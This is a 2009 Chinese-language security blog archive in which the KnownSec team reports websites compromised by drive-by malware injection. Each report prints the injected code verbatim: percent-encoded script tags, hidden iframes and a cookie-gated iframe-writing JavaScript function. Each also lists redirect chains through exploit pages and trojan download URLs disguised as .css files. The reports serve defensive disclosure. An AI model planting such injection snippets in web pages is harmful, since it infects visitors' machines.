This theme is downloaded from wordpress themes website.

Archive for January, 2009

甘肃考试服务网被植入恶意代码

发布时间:Sat Jan 31 2009 20:25:57 UTC+0800
最后更新时间:Sat Jan 31 2009 20:25:57 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 甘肃考试服务网(http://www.gszk.net/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.gszk.net/

网页被嵌入恶意链接代码:

snap4.jpg

<script src=http://%76%76%6B%32%2E%63%6E></script><script src=http://%76%76%6B%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><script src=http://%68%68%6A%32%2E%63%6E></script><iframe src=http://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe>

挂马分析:
[wide]http://www.gszk.net/
 [script]http://%76%76%6b%32%2e%63%6e
  [frame]http://www.710sese.cn/a1/ilink.html
  [frame]http://www.710sese.cn/a1/flink.html
  [frame]http://www.baomaaa.cn/b2.htm
   [frame]http://www.710sese.cn/a2/fxx.htm
    [frame]http://www.710sese.cn/a2/fx.htm
    [frame]http://www.710sese.cn/a2/../a1/ss.htm
     [script]http://www.710sese.cn/a2/../a1/woriniss.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/ms06014.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/no.htm
     [script]http://www.710sese.cn/a2/../a1/wokaono.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/bfyy.htm
    [frame]http://www.710sese.cn/a2/../a1/glworld.html
     [script]http://www.710sese.cn/a2/../a1/hohogl.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/real.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/real.html
     [script]http://www.710sese.cn/a2/../a1/realdadong.js
      [exe]http://d.weixk.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/857114/ystet.js
 [script]http://%68%68%6a%32%2e%63%6e
  [frame]http://www.710sese.cn/a1/ilink.html
  [frame]http://www.710sese.cn/a1/flink.html
  [frame]http://www.baomaaa.cn/b2.htm
   [frame]http://www.710sese.cn/a2/fxx.htm
    [frame]http://www.710sese.cn/a2/fx.htm
    [frame]http://www.710sese.cn/a2/../a1/ss.htm
     [script]http://www.710sese.cn/a2/../a1/woriniss.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/ms06014.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/no.htm
     [script]http://www.710sese.cn/a2/../a1/wokaono.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/bfyy.htm
    [frame]http://www.710sese.cn/a2/../a1/glworld.html
     [script]http://www.710sese.cn/a2/../a1/hohogl.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/real.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a2/../a1/real.html
     [script]http://www.710sese.cn/a2/../a1/realdadong.js
      [exe]http://d.weixk.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/857114/ystet.js
 [frame]http://www.falaliqq.cn/b3.htm
  [frame]http://www.710sese.cn/a8/fxx.htm
   [frame]http://www.710sese.cn/a8/fx.htm
   [frame]http://www.710sese.cn/a8/../a1/ss.htm
    [script]http://www.710sese.cn/a8/../a1/woriniss.js
     [exe]http://d.weixk.com/new/a1.css
   [frame]http://www.710sese.cn/a8/../a1/ms06014.htm
    [exe]http://d.weixk.com/new/a1.css
   [frame]http://www.710sese.cn/a8/../a1/sina.htm
    [exe]http://d.oixka.com/new/a1.css
   [frame]http://www.710sese.cn/a8/../a1/no.htm
    [script]http://www.710sese.cn/a8/../a1/wokaono.js
     [exe]http://d.weixk.com/new/a1.css
   [frame]http://www.710sese.cn/a8/../a1/bfyy.htm
   [frame]http://www.710sese.cn/a8/../a1/glworld.html
    [script]http://www.710sese.cn/a8/../a1/hohogl.js
     [exe]http://d.weixk.com/new/a1.css
   [frame]http://www.710sese.cn/a8/../a1/real.htm
    [exe]http://d.weixk.com/new/a1.css
   [frame]http://www.710sese.cn/a8/../a1/real.html
    [script]http://www.710sese.cn/a8/../a1/realdadong.js
     [exe]http://d.weixk.com/new/a1.css
  [script]http://js.tongji.cn.yahoo.com/857114/ystat.js
 [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
 [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
最终下载病毒文件:
http://d.weixk.com/new/a1.css
http://d.oixka.com/new/a1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 8% [?]

网站挂马记录 lk 31 Jan 2009 No Comments

重庆音乐电台被植入恶意代码

发布时间:Sat Jan 31 2009 20:25:57 UTC+0800
最后更新时间:Sat Jan 31 2009 20:25:57 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 重庆音乐电台(http://fm881.cqwin.com/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://fm881.cqwin.com/

网页被嵌入恶意链接代码:

snap3.jpg

<script src=http://3bomb.%63%6Fm/c.js></script>
<script src=http://s581.3322.org/c.js></script>
<script src=http://e6t.3322.org/c.js></script>

挂马分析:
[wide]http://fm881.cqwin.com/
 [frame]http://fm881.cqwin.com//topfiles/index.htm
 [frame]http://fm881.cqwin.com/fm881_player.asp
 [script]http://3bomb.%63%6fm/c.js
  [frame]http://www.2009eeee.cn/llsg/2.htm
   [frame]http://www.710sese.cn/a114/fxx.htm
    [frame]http://www.710sese.cn/a114/fx.htm
    [frame]http://www.710sese.cn/a114/../a1/ss.htm
     [script]http://www.710sese.cn/a114/../a1/woriniss.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/ms06014.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/no.htm
     [script]http://www.710sese.cn/a114/../a1/wokaono.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/bfyy.htm
    [frame]http://www.710sese.cn/a114/../a1/glworld.html
     [script]http://www.710sese.cn/a114/../a1/hohogl.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.html
     [script]http://www.710sese.cn/a114/../a1/realdadong.js
      [exe]http://d.weixk.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/860886/ystat.js
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
 [script]http://s581.3322.org/c.js
  [frame]http://www.2009eeee.cn/llsg/2.htm
   [frame]http://www.710sese.cn/a114/fxx.htm
    [frame]http://www.710sese.cn/a114/fx.htm
    [frame]http://www.710sese.cn/a114/../a1/ss.htm
     [script]http://www.710sese.cn/a114/../a1/woriniss.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/ms06014.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/no.htm
     [script]http://www.710sese.cn/a114/../a1/wokaono.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/bfyy.htm
    [frame]http://www.710sese.cn/a114/../a1/glworld.html
     [script]http://www.710sese.cn/a114/../a1/hohogl.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.html
     [script]http://www.710sese.cn/a114/../a1/realdadong.js
      [exe]http://d.weixk.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/860886/ystat.js
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
 [script]http://e6t.3322.org/c.js
  [frame]http://www.2009eeee.cn/llsg/2.htm
   [frame]http://www.710sese.cn/a114/fxx.htm
    [frame]http://www.710sese.cn/a114/fx.htm
    [frame]http://www.710sese.cn/a114/../a1/ss.htm
     [script]http://www.710sese.cn/a114/../a1/woriniss.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/ms06014.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/no.htm
     [script]http://www.710sese.cn/a114/../a1/wokaono.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/bfyy.htm
    [frame]http://www.710sese.cn/a114/../a1/glworld.html
     [script]http://www.710sese.cn/a114/../a1/hohogl.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.html
     [script]http://www.710sese.cn/a114/../a1/realdadong.js
      [exe]http://d.weixk.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/860886/ystat.js
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js

最终下载病毒文件:
http://d.weixk.com/new/a1.css
http://d.oixka.com/new/a1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 8% [?]

网站挂马记录 lk 31 Jan 2009 No Comments

江苏校园招聘网被植入恶意代码

发布时间:Sat Jan 31 2009 20:25:57 UTC+0800
最后更新时间:Sat Jan 31 2009 20:25:57 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 江苏校园招聘网(http://www.jsxyzp.com/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.jsxyzp.com/

网页被嵌入恶意链接代码:

 snap1.jpg

<script src=http://3bomb.%63%6Fm/c.js></script>

链接解密后为:http://3bomb.com/c.js

挂马分析:
[wide]http://www.jsxyzp.com/
 [script]http://3bomb.%63%6fm/c.js
  [frame]http://www.2009eeee.cn/llsg/2.htm
   [frame]http://www.710sese.cn/a114/fxx.htm
    [frame]http://www.710sese.cn/a114/fx.htm
    [frame]http://www.710sese.cn/a114/../a1/ss.htm
     [script]http://www.710sese.cn/a114/../a1/woriniss.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/ms06014.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/no.htm
     [script]http://www.710sese.cn/a114/../a1/wokaono.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/bfyy.htm
    [frame]http://www.710sese.cn/a114/../a1/glworld.html
     [script]http://www.710sese.cn/a114/../a1/hohogl.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.html
     [script]http://www.710sese.cn/a114/../a1/realdadong.js
      [exe]http://d.weixk.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/860886/ystat.js
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
最终下载病毒文件:
http://d.weixk.com/new/a1.css
http://d.oixka.com/new/a1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 10% [?]

网站挂马记录 lk 31 Jan 2009 No Comments

中国行业网站联盟被植入恶意代码

发布时间:Sat Jan 31 2009 20:25:57 UTC+0800
最后更新时间:Sat Jan 31 2009 20:25:57 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 中国行业网站联盟(http://union.souyes.com/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://union.souyes.com/

网页被嵌入恶意链接代码:

snap1.jpg

<script src=http://3bomb.c%6Fm/c.js></script>

链接解密后为:http://3bomb.com/c.js

挂马分析:
[wide]http://union.souyes.com/
 [script]http://union.souyes.com/openwin.js
 [script]http://union.souyes.com/openwin1.js
 [script]http://3bomb.c%6fm/c.js
  [frame]http://www.2009eeee.cn/llsg/2.htm
   [frame]http://www.710sese.cn/a114/fxx.htm
    [frame]http://www.710sese.cn/a114/fx.htm
    [frame]http://www.710sese.cn/a114/../a1/ss.htm
     [script]http://www.710sese.cn/a114/../a1/woriniss.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/ms06014.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/no.htm
     [script]http://www.710sese.cn/a114/../a1/wokaono.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/bfyy.htm
    [frame]http://www.710sese.cn/a114/../a1/glworld.html
     [script]http://www.710sese.cn/a114/../a1/hohogl.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.html
     [script]http://www.710sese.cn/a114/../a1/realdadong.js
      [exe]http://d.weixk.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/860886/ystat.js
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
 [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
 [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

最终下载病毒文件:
http://d.weixk.com/new/a1.css
http://d.oixka.com/new/a1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 8% [?]

网站挂马记录 lk 31 Jan 2009 No Comments

2009年1月31日挂马简报

发布时间:Sat Jan 31 2009 20:23:34 UTC+0800
最后更新时间:Sat Jan 31 2009 20:23:34 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:安徽安全技术防范行业网、萧萧音乐网、
 

安徽安全技术防范行业网(hxxp://www.aspia.cn/)多处被植入恶意代码:
<Script Src=hxxp://c.nuclear3%2E%63om/css/c.js></Script>
恶意链接地址解密后为:
hxxp://c.nuclear3.com/css/c.js
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

萧萧音乐网(hxxp://www.pq520.com/list/1_1.html)底部被植入恶意代码:
function goad(){
var Then = new Date()
Then.setTime(Then.getTime() + 4*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookier1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = “Cookier1=Filter;expires=”+ Then.toGMTString()
document.write(’<iframe src=”hxxp://www.bengchikk.cn/one/a39.htm” width=”50″ height=”0″ frameborder=”0″></iframe>’);
}
}goad();
</script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 10% [?]

网站挂马记录 lk 31 Jan 2009 No Comments

2009年1月30日挂马简报

发布时间:Fri Jan 30 2009 21:54:46 UTC+0800
最后更新时间:Fri Jan 30 2009 21:54:46 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:雅家、幼教之家网、无忧房产、
 

雅家(hxxp://www.yahome.com.cn/)多处被植入恶意代码:
<script src=hxxp://e6t.3322.org/c.js></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

幼教之家网(hxxp://www.szyjzj.cn/)多处被植入恶意代码:
<script src=hxxp://3bomb.%63om/c.js></script>
恶意链接地址解密后为:
hxxp://3bomb.com/c.js
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

无忧房产(hxxp://www.51fang.cn/)多处被植入恶意代码:
<script src=hxxp://3bomb.%63om/c.js></script>
恶意链接地址解密后为:
hxxp://3bomb.com/c.js
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 11% [?]

网站挂马记录 lk 30 Jan 2009 No Comments

2009年1月29日挂马简报

发布时间:Thu Jan 29 2009 22:35:26 UTC+0800
最后更新时间:Thu Jan 29 2009 22:35:26 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:深圳市芭蕾数码科技有限公司、传媒中国、绍兴房产网、
 

深圳市芭蕾数码科技有限公司(hxxp://qs-ballet.com/)多处被植入恶意代码:
<script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script>
恶意链接地址解密后为:
<script src=hxxp://hhj7.cn></script><script src=hxxp://vvk7.cn></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

传媒中国(hxxp://www.cm958.cn/ad/200708/1.js)底部被植入恶意代码:
document.writeln(”<script src=http:\/\/%61%64%2E%61%6C%69%6D%61%6D%61%63%63%2E%63%6E\/%61%64%5F%30%30%32%31%31%2E%6A%73><\/script>”);
恶意链接地址解密后为:
hxxp://ad.alimamacc.cn/ad_00211.js
通过漏洞攻击,最终下载病毒:
hxxp://qq.18i16.net/exe1/b09.css
hxxp://qq.18i16.net/exe1/lzz.css
hxxp://qq.18i16.net/exe1/bf.css
hxxp://qq.18i16.net/exe1/re.css
hxxp://qq.18i16.net/exe1/real11.css
hxxp://qq.18i16.net/Baidu.cab
hxxp://121.12.173.218/exe1/cx.css
 

绍兴房产网(hxxp://www.0575fcw.cn/)被植入恶意代码:
<script src=hxxp://www.hon520.cn/images/xx.gif></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 11% [?]

网站挂马记录 lk 29 Jan 2009 No Comments

2009年1月28日挂马简报

发布时间:Wed Jan 28 2009 15:44:39 UTC+0800
最后更新时间:Wed Jan 28 2009 15:44:39 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:海伦钢琴、中国家具导购网、东方虹中国整形美容网、
 

海伦钢琴(hxxp://www.hailunpiano.com/)底部被植入恶意代码:
<iframe srC=hxxp://%6E%65%77%61%73%70%2E%63%6E%79%6A%77%6C%2E%63%6F%6D/ Width=0 Name=’1424′ heIght=0></Iframe>
恶意链接地址解密后为:
hxxp://newasp.cnyjwl.com/
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

中国家具导购网(hxxp://www.jiaju360.com/)多处被植入恶意代码:
<script src=hxxp://s581.3322.org/c.js></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

东方虹中国整形美容网(hxxp://www.dfhon.com/)多处被植入恶意代码:
<script src=hxxp://s581.3322.org/c.js></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 9% [?]

网站挂马记录 lk 28 Jan 2009 No Comments

2009年1月27日挂马简报

发布时间:Tue Jan 27 2009 19:27:07 UTC+0800
最后更新时间:Tue Jan 27 2009 19:27:07 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:我要旅游网、四川饮食网、翔云大酒店、
 

我要旅游网(hxxp://www.516u.com/)多处被植入恶意代码:
<script src=hxxp://3%62omb.com/c.js></script>
恶意链接地址解密后为:
hxxp://3bomb.com/c.js
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

四川饮食网(hxxp://www.scysw.com/)多处被植入恶意代码:
<script src=hxxp://e6t.3322.org/c.js></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

翔云大酒店(hxxp://www.nnxyhotel.com/)多处被植入恶意代码:
<script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script>
恶意链接地址解密后为:
<script src=hxxp://hhj7.cn></script>
<script src=hxxp://vvk7.cn></script>
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 10% [?]

网站挂马记录 lk 27 Jan 2009 No Comments

2009年1月26日挂马简报

发布时间:Mon Jan 26 2009 20:03:10 UTC+0800
最后更新时间:Mon Jan 26 2009 20:03:10 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:zippo中文资讯网站、芜湖绿叶制药有限公司、全球酒店论坛、
 

zippo中文资讯网站(hxxp://www.hizippo.com/)多处被植入恶意代码:
<script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%68%68%6A%35%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script>
恶意链接地址解密后为:
<script src=hxxp://vvk3.cn></script>
<script src=hxxp://hhj5.cn></script>
<script src=hxxp://vvk5.cn></script>
<script src=hxxp://hhj7.cn></script>
<script src=hxxp://vvk7.cn></script>

通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

芜湖绿叶制药有限公司(hxxp://www.luye-pharm-wh.com/)多处被植入恶意代码:
<script src=hxxp://3bomb.co%6D/c.js></script>
恶意链接地址解密后为:
hxxp://3bomb.com/c.js
通过漏洞攻击,最终下载病毒:
hxxp://d.weixk.com/new/a1.css
hxxp://d.oixka.com/new/a1.css
 

全球酒店论坛(hxxp://www.global-hotel.com.cn/)底部被植入恶意代码:
<script language=”JavaScript” src=”hxxp://vc.zaqaab.cn/ko.js” type=”text/JavaScript”></script>
通过漏洞攻击,最终下载病毒:
hxxp://jbl.trcwoman.info/ie.exe
 

推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com

Popularity: 11% [?]

网站挂马记录 lk 26 Jan 2009 No Comments

Next Page »

Recommended: Buy movies online.